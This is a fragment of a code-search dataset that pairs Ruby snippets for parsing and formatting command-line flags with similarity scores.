"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
"def getopt_args\n if short\n [[\"--#{name}\", \"-#{short}\", GetoptLong::REQUIRED_ARGUMENT]]\n else\n [[\"--#{name}\", GetoptLong::REQUIRED_ARGUMENT]]\n end\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag _args\n \"flag _args;\" \n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def flag(*names)\n options = extract_options(names)\n names = [names].flatten\n\n verify_unused(names)\n flag = Flag.new(names,options)\n flags[flag.name] = flag\n\n clear_nexts\n flags_declaration_order << flag\n flag\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def format_flag(flag)\n if flag.length == 1\n \" -#{flag}\"\n else\n \" --#{flag.to_s.tr('_', '-')}\"\n end\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def parse argv\n @bare.clear\n eoo = argv.index '--' # end of options\n if eoo\n tail = argv[eoo+1 .. ]\n argv = argv[ .. eoo-1]\n end\n re = /^-{1,2}(?=[^-])/\n for first,second in argv.chunk_while{ _1 =~ re and _2 !~ re }\n case first\n when /^--(?i:no)-(?=[^-])/\n # --no-long\n p = plong $~.post_match\n raise \"#{p.long} is not boolean\" unless p.boolean\n @buffer[p] = false\n @bare.push second if second\n when /^--(?=[^-])/\n # --long\n p = plong $~.post_match\n if p.boolean\n @buffer[p] = true\n @bare.push second if second\n else\n @buffer[p] = second\n end\n when /^-(?=[^-])(?!.*[0-9])/\n # -short\n letters = $~.post_match.chars\n b,o = letters.map{ pshort _1 }.partition &:boolean\n b.each{ @buffer[_1] = true }\n o.each{ @buffer[_1] = nil }\n if second\n if o.empty?\n @bare.push second\n else\n @buffer[o.pop] = second\n end\n end\n else\n # bare\n @bare.push first\n end\n end\n @bare.concat tail if tail\n end",
"def mask_array\n @mask.split('')\n end",
"def dashed_flag_for setting_name, flag_name=nil\n return unless self[setting_name]\n flag_name ||= setting_name\n (self[setting_name] == true ? \"--#{flag_name.to_s.gsub(/_/,\"-\")}\" : \"--#{flag_name.to_s.gsub(/_/,\"-\")}=#{self[setting_name]}\" )\n end",
"def required_flags\n flags.select &:required\n end",
"def symbols\n @flags.keys\n end",
"def program_options\n [\n # The values of the array are,\n # [long_option, short_option and parameter, description, code to execute]\n ['--google', '-g', \"Format for Google blogger.\",\n lambda { |value| options.google = true }\n ],\n ['--jayway', '-j', \"Format for Jayway blog.\",\n lambda { |value| options.jayway = true }\n ],\n ['--utf', '-u', \"Include meta charset utf8\",\n lambda { |value| options.utf = true }\n ],\n ['--stylesheet', '-s', \"Add a stylesheet, md.css\",\n lambda { |value| options.stylesheet = true }\n ],\n ['--verbose', '-v', \"Log to standard output.\",\n lambda { |value| options.verbose = true }\n ],\n ['--version', '-V', \"Display the program version.\",\n lambda { |value|\n puts \"#{program_name}, version #{PROGRAM_VERSION}\"\n exit\n }\n ]\n ]\nend",
"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def names\n @opt_types.keys.map {|e| undasherize e }\n end",
"def dashed_flag_for setting_name, flag_name=nil\n return unless Settings[setting_name]\n flag_name ||= setting_name\n (Settings[setting_name] == true ? \"--#{flag_name.to_s.gsub(/_/,\"-\")}\" : \"--#{flag_name.to_s.gsub(/_/,\"-\")}=#{Settings[setting_name]}\" )\n end",
"def stow_command_flags\n flags = ''\n flags += \"-t #{stow_target}\" unless stow_target.nil?\n flags += \"-d #{stow_path}\" unless stow_path.nil?\n flags\n end",
"def wix_extension_switches(arr)\n \"#{arr.map {|e| \"-ext '#{e}'\"}.join(' ')}\"\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def parse_from_human(boolean_pattern)\n self[0...length] = [] #remove the last pattern if it existed\n boolean_pattern.each_char do |char|\n if char == '1'\n push true\n elsif char == '0'\n push false\n elsif char == '-'\n push nil\n else\n raise \"Unexpected pattern character: #{char}\"\n end\n end\n end",
"def extract_flag(p, flag)\n breakdown = flag.split(\"*\")\n if flag.match(/^---.*/)\n parse_error! p, \"Flags must be prefixed with two hyphens (-); #{flag} has more than that.\"\n end\n\n if breakdown.length > 2\n parse_error! p, \"The flag #{flag} can have only one *. * is used to indicate the short flag name.\"\n end\n prefix, suffix = breakdown\n if suffix\n if suffix.length == 0\n parse_error! p, \"The flag #{flag} has a short-name indicator (*) at the end of the flag. This special character should be placed before the letter you wish to use as the short name for the flag.\"\n end\n short = suffix.slice(0)\n suffix = suffix.slice(1..-1)\n flag = \"#{prefix}#{short}#{suffix}\"\n else\n short = nil\n end\n # TODO validate all caps, plus optional surrounding matched [ ] around arg\n flag_arg = p.advance_token == :EOL ? nil : p.current_token\n if (p.peek_token != :EOL)\n parse_error! p, \"#{flag} can take at most one argument, but more than one is provided.\"\n end\n description = parse_command_definition_description(p.parser_from_children)\n flag = CommandFlag.new(flag, flag_arg, short, description)\n end",
"def options\n ops = {}\n @options.each_value do |data|\n if data.given?\n if !data.short_name.nil?\n ops[data.short_name] = nil\n else\n ops[data.long_name] = nil\n end\n end\n end\n return ops.keys\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def flags; end",
"def flags(path)\n if @manifest_entry ||= nil\n return manifest_entry.flags[path] || \"\"\n end\n pnode = parents[0].raw_changeset[0]\n \n orig = @repo.dirstate.copy_map[path] || path\n node, flag = @repo.manifest.find(pnode, orig)\n return @repo.dirstate.flags(@repo.working_join(path))\n end",
"def to_options_array\n options_array = []\n attributes.each do |attr_name, value|\n next if value.blank?\n\n # explicit check for == true to flag-only options that have no value, like --extract \"['cluster', 'metadata']\"\n if value == true\n options_array << Parameterizable.to_cli_opt(attr_name)\n else\n options_array += [Parameterizable.to_cli_opt(attr_name), value.to_s]\n end\n end\n options_array << self.class::PARAMETER_NAME if defined? self.class::PARAMETER_NAME\n options_array\n end",
"def to_s\n @flags.join(', ')\n end",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def parse_smashed(arg)\n opts = {}\n # preceding dash and flag have been removed\n val = arg.dup\n loop {\n break if val.empty?\n char = val.slice!(0, 1)\n sym = @index[:short][char]\n raise \"unknown flag smashed in: #{char} in #{arg}\" unless sym\n\n spec = @option_specs.fetch(sym)\n if spec[:value]\n val.slice!(0, 1) if val[0] == '='\n if val.empty?\n opts[sym] = nil # tell parse() we need another arg; ugh, hack!\n else\n opts[sym] = val\n end\n break # a value always ends the smash\n else\n opts[sym] = true\n end\n }\n opts\n end",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def split_args(ary)\n\tfiles = []\n\topts = []\n\tc = false\n\tary.each do |i|\n\t\tnext if i == '-'\n\t\tif i == '--' then\n\t\t\tc = true\n\t\t\tnext\n\t\tend\n\t\tfiles << i if c or not (i =~ /^-/)\n\t\topts << i if (not c) and (i =~ /^-/)\n\tend\n\t[files, opts]\nend",
"def flag_as(flag)\n raise ArgumentError if flag.class != String\n @flag = flag\n end",
"def range_all\n [ range(:upper_alphas), \n range(:lower_alphas), \n range(:numerals), \n range(:symbols_1), \n range(:symbols_2), \n range(:symbols_3), \n range(:symbols_4), \n range(:symbols_5), \n range(:symbols_6),\n range(:single_quotes),\n range(:double_quotes),\n range(:backtick) ]\n end",
"def _flag_nations\n %w{ar cc it de ie fr es en goo br po pt }.sort\nend",
"def form_flagstring(f, fall)\n\t\tflagSelectAll = (!fall.nil? && fall.to_s.downcase == \"all\")\n\t\tif(flagSelectAll || f.nil? || f.empty?)\n\t\t\tflagStr = \"all\"\n\t\telse\n\t\t\tflagStr = f.join(\"|\")\n\t\tend\n\n\t\treturn flagStr\n\tend",
"def extract_command_flags!(parameters)\n raw_command_flags = parameters.flatten.find_all { |arg| arg.start_with? \"--\" }\n parameters.delete_if { |param| raw_command_flags.include? param }\n\n flag_names = raw_command_flags.map { |flag| flag[/--(.+)$/,1].underscore.to_sym }\n flag_values = [ true ] * flag_names.count\n Hash[flag_names.zip(flag_values)]\n end",
"def valid_options\n self::OPTIONS.map(&:to_s).join(', ')\n end",
"def get_flags( remove = nil )\n\n\t\t# escape dashes for split\n\t\t@value.gsub!(/\\\\\\-/, \"<dash>\")\n\n\t\t# Remove command, split by spaces\n\t\tif remove.nil?\n\t\t\tvars = @value.split(/\\s-/)\n\t\telse\n\t\t\tvars = @value.gsub( remove, '' ).split(/\\s-/)\n\t\tend\n\n\t\t# Hash to return\n\t\tflags = Hash.new\n\t\t# for each pair of arguments, place in Hash\n\t\t# \tflags[ flag ] = argument\n\t\tvars.each do |str|\n\t\t\n\t\t\t# Extract key and value\n\t\t\tkey = str[/^\\S+/]\n\t\t\tvalue = str.sub(/^\\S+ /, '' ).gsub(\"<dash>\", '-')\n\n\t\t\t# parse true/false values\n\t\t\tvalue = true if value.downcase == 'yes' or value.downcase == 'true'\n\t\t\tvalue = false if value.downcase == 'no' or value.downcase == 'false'\n\n\t\t\tvalue.chop! if value[-1] =~ /\\s/\n\t\t\tvalue = nil if value == ''\n\n\t\t\tflags[ key.to_sym ] = value unless key.nil?\n\t\t\t\n\t\tend\t\t\n\n\t\t# Return result\n\t\tflags\n\n\tend",
"def flags\n response[\"flags\"]\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def read_argv_flags argsIn\r\n skipVal = argsIn.length + 1\r\n argsIn.each_with_index do |argIn, ind|\r\n next if skipVal == ind\r\n arg = argIn.downcase()\r\n if arg[0].eql? '-'\r\n symAgr = strip_to_sym(arg)\r\n if @options[symAgr].is_a? String\r\n @options[symAgr] = argsIn[ind + 1]\r\n skipVal = ind + 1\r\n elsif @options[symAgr] == false\r\n @options[symAgr] = true\r\n elsif @options[symAgr].is_a? Array\r\n @options[symAgr] = argsIn[ind + 1]\r\n end\r\n elsif known_file_type arg\r\n @options[:f] << argIn.gsub(/(\\.\\/)|(\\.\\\\)/,'')\r\n end\r\n puts argIn\r\n end\r\n end",
"def extract(_options_str = nil)\n @options_str = _options_str if _options_str # hook for testing\n @extract ||= begin\n lines_containing_options = options_str.split(/\\n/).grep(/^[\\s\\t]+-/)\n all_options = lines_containing_options.inject([]) do |list, line|\n list + line.scan(/(?:^\\s+|,\\s)(-[\\w-]+)/).flatten\n end\n long_options = all_options.grep(/^--/).sort\n short_options = hide_short_flags? ? [] : (all_options - long_options).sort\n long_options + short_options\n end\n end",
"def flagging\n @title = 'Flags and their meaning'\n @css = 'flags.css'\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def _list_args args\n incl = []\n excl = []\n args.each do |e| \n if e[0] == '+'\n incl << e[1..-1]\n elsif e[0] == '-'\n excl << e[1..-1]\n else\n incl << e\n end\n end\n incl = nil if incl.empty?\n excl = nil if excl.empty?\n return incl, excl\n end",
"def get_flags(*files)\n matches = []\n begin\n files.each do |f|\n file = File.new(f, 'r')\n while (line = file.gets)\n m = line.match(/(^.*=)?/)\n matches << m[0] if m\n end\n file.close\n end\n rescue => err\n puts 'Exception: #{err}'\n err\n end\n matches.uniq.sort!\nend",
"def options(opt)\n []\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def allow_short_words\n not @emphasis[:ignore_short_words]\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def feature_args(ci_gcc_config)\n return [] if ci_gcc_config[:features].nil?\n\n ci_gcc_config[:features].map { |f| \"-f#{f}\" }\n end"
] | [
"0.68840307",
"0.68386215",
"0.67959255",
"0.67517674",
"0.66765195",
"0.63936436",
"0.6337571",
"0.6337571",
"0.61796635",
"0.61295277",
"0.6074809",
"0.60621995",
"0.60491186",
"0.6028328",
"0.59460676",
"0.592124",
"0.5807492",
"0.578661",
"0.5730183",
"0.5730183",
"0.56504935",
"0.5626171",
"0.5596782",
"0.55833936",
"0.5562892",
"0.5558395",
"0.55371296",
"0.5529985",
"0.55254084",
"0.550028",
"0.5498306",
"0.54610884",
"0.5452953",
"0.5448171",
"0.5443153",
"0.54057145",
"0.5393011",
"0.53580284",
"0.53198564",
"0.5297528",
"0.52436084",
"0.5238536",
"0.5225288",
"0.5191688",
"0.5181225",
"0.51696485",
"0.51629317",
"0.51629317",
"0.5141602",
"0.512931",
"0.5125351",
"0.5103369",
"0.5102546",
"0.50960237",
"0.50949335",
"0.5088183",
"0.5087261",
"0.5075209",
"0.5068106",
"0.50452584",
"0.5043314",
"0.50413436",
"0.50403756",
"0.50332594",
"0.5032046",
"0.50320303",
"0.5000553",
"0.49554086",
"0.49456102",
"0.4921939",
"0.49217355",
"0.49199674",
"0.49179968",
"0.49129474",
"0.49009958",
"0.48992848",
"0.48766378",
"0.48671076",
"0.48513842",
"0.48430872",
"0.48318136",
"0.48285815",
"0.48280758",
"0.4827478",
"0.48102763",
"0.48024434",
"0.4800768",
"0.4785696",
"0.47828892",
"0.47765368",
"0.4776312",
"0.47701102",
"0.47701102",
"0.47686848",
"0.47671086",
"0.47634205",
"0.47595567",
"0.47574952",
"0.4756902",
"0.47553086"
] | 0.72635776 | 0 |
An array of Flag::Syntax including only long (double dash) flags. | def long_flag_syntax
@long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def matching_flag_strings\n @flags.map do |_flag, flag_syntax, negative|\n negative ? flag_syntax.negative_flag : flag_syntax.positive_flag\n end\n end",
"def flags\n return [] unless options[\"flags\"]\n options[\"flags\"].map do |options|\n Flag.new options\n end\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def dashed_flags *settings_and_names\n settings_and_names.map{|args| dashed_flag_for(*args) }.compact\n end",
"def flags\n [long, short].compact\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def flags\n match(/Flags\\s+:\\s+(.+)$/).split rescue []\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def flags\n flags = Array.new\n if self.flag_attr\n self.flag_attr.split(\", \").each do |flag|\n flags << flag.to_sym\n end\n end\n\n return flags\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def to_argv\n flags = []\n each do |f,v|\n m = f.to_s.size == 1 ? '-' : '--'\n case v\n when Array\n v.each{ |e| flags << \"#{m}#{f}='#{e}'\" }\n when true\n flags << \"#{m}#{f}\"\n when false, nil\n # nothing\n else\n flags << \"#{m}#{f}='#{v}'\"\n end\n end\n flags\n end",
"def flag_args(ci_gcc_config)\n return [] if ci_gcc_config[:flags].nil?\n\n ci_gcc_config[:flags]\n end",
"def generate_cli_flags\n @flags.map{|pair| pair.join(' ')}.join(' ').gsub(' true','')\n end",
"def valid_options\n %i(\n\n ) # end array\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def flag\n flags.join(\", \")\n end",
"def canonical_syntax_strings\n @canonical_syntax_strings ||= flag_syntax.map(&:canonical_str)\n end",
"def generate_flags_flat overrides = {}\n generate_flags(overrides).map { |k, v| [k, v] }.concat(%w|--force .|).flatten\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def flag_list(flag, list)\n list&.map do |value|\n \"#{flag}=#{value}\"\n end\n end",
"def get #:nodoc:\n p = Array.new\n p.push(@long_form)\n p.push(@short_form) if @short_form != \"\"\n p.push(@arg_flag)\n return p\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def extract_flags\n @flags.clear\n rules.each_with_index do |r, i|\n @flags << i unless r.alternatives.size == 1\n end\n end",
"def flag _args\n \"flag _args;\" \n end",
"def thor_options_to_optparse\n flags = []\n %i[color progress debug interactive].each do |option|\n if options[option] then flags << \"--#{option}\"\n else flags << \"--no-#{option}\"\n end\n end\n flags\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def flags\n @flags ||= Set.new([])\n end",
"def for_option_parser\n [short, long, return_type, description].flatten.reject{ |o| o.to_s.empty? }\n end",
"def options # :nodoc:\n [].tap do |o|\n o << \"Lazy\" if lazy?\n o << \"Reverse\" if reverse?\n o << \"Exclude [#{all_excluded_words.join(\", \")}]\" if excluded_words.any?\n o << \"No Options\" if o.empty?\n end\n end",
"def syntax\n t = @cmd_args\n t = [[t]] if !t.is_a? Array\n\n args = [] \n count = 0\n t.each do |expected_array|\n count += 1\n if count == 1\n str = \"Syntax: #{@cmd_name}\"\n else\n str = \" #{@cmd_name}\"\n end\n expected_array.each do |expected|\n # each expected arg.\n str += case expected\n when :arg_none then \"\"\n when :arg_dir! then \" <direction>\"\n when :arg_str! then \" <string literal>\"\n when :arg_word!then \" <word>\"\n when :arg_int! then \" <#>\"\n when :arg_obj_inv! then \" <item>\"\n when :arg_obj_room! then \" <item>\"\n when :arg_obj_inv_or_room! then \" <item>\"\n when :arg_class! then \" <Class>\"\n when :arg_player_in_game! then \" <player in game>\"\n when :arg_player_offline! then \" <any player>\"\n when :arg_actor_room! then \" <npc/player>\"\n when String then \" \" + expected \n else \"\"\n \n end\n end \n args << str\n end\n return args\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def flags\n # Hash#index becomes Hash#key in Ruby 1.9.\n index_method = RUBY_VERSION < '1.9' ? :index : :key\n # Map the integer @flags to array of flag symbols\n # (This may be cute but it's not very efficient!)\n [ @flags ].flatten.first.to_s(2). # extract flags as binary string\n split(//).map{ |bit| bit.to_i }. # convert to array of bits\n reverse. # reverse order to work from lsb\n inject([]) { |r,v| r << v * (1 << r.length) }. # convert each bit to decimal\n reject { |flag| flag == MAGIC_FLAGS[:none] }. # discard MAGIC_NONE flag\n map { |int_flag| MAGIC_FLAGS.send(index_method, int_flag) } # map decimal integer to symbol\n end",
"def optparse_args\n if short\n [\"--#{name}\", \"-#{short}\", desc, :REQUIRED]\n else\n [\"--#{name}\", desc, :REQUIRED]\n end\n end",
"def normalize_flags(flags)\n if flags.is_a?(Array)\n flags.uniq.sort.join(' ')\n else\n flags\n end\n end",
"def long_opt_symbol(args); end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def test_multi_stringflag_as_strings\n opts = @p.parse %w(--xyz dog --xyz cat)\n assert_equal true, opts[:xyz_given]\n assert_equal [\"dog\",\"cat\"], opts[:xyz]\n assert_equal [], opts[:abc] # note, multi-args default to empty array\n assert_nil opts[:ghi_given]\n assert_equal [\"gg\",\"hh\"], opts[:ghi]\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def getopt_args\n if short\n [[\"--#{name}\", \"-#{short}\", GetoptLong::REQUIRED_ARGUMENT]]\n else\n [[\"--#{name}\", GetoptLong::REQUIRED_ARGUMENT]]\n end\n end",
"def flag(*names)\n names = [names].flatten\n GLI.verify_unused(names,flags,switches,\"in command #{name}\")\n flag = Flag.new(names,@next_desc,@next_arg_name,@next_default_value,@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def format_flags(flags)\n # other flags like \"Old\" should be hidden here\n flags = flags.map {|flag| FLAGMAP[flag] || flag}\n flags.delete(\"Old\")\n if flags.delete(:Seen).nil?\n flags << '+' # unread\n end\n flags.join('')\n end",
"def elementary_flag_names\n flagset_builder.elementary_flag_names\n end",
"def mask_array\n @mask.split('')\n end",
"def flags=(flags)\n self.flag_attr = flags.map{|flag| flag.to_s}.join(\", \");\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def get_flag_path_array problem, solution, comment, flag\n if solution.nil?\n path = [problem, comment, flag]\n elsif comment.nil?\n path = [problem, solution, flag]\n else\n path = [problem, solution, comment, flag]\n end\n path\n end",
"def switches\n [long, negative_long, short].compact\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def flags\n @flags ||= Array.wrap(Flag.where(:published => true))\n end",
"def as_flag_collection(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << [flag, flag_enabled?(flag, colmn)]\n end\n end",
"def symbols\n @flags.keys\n end",
"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
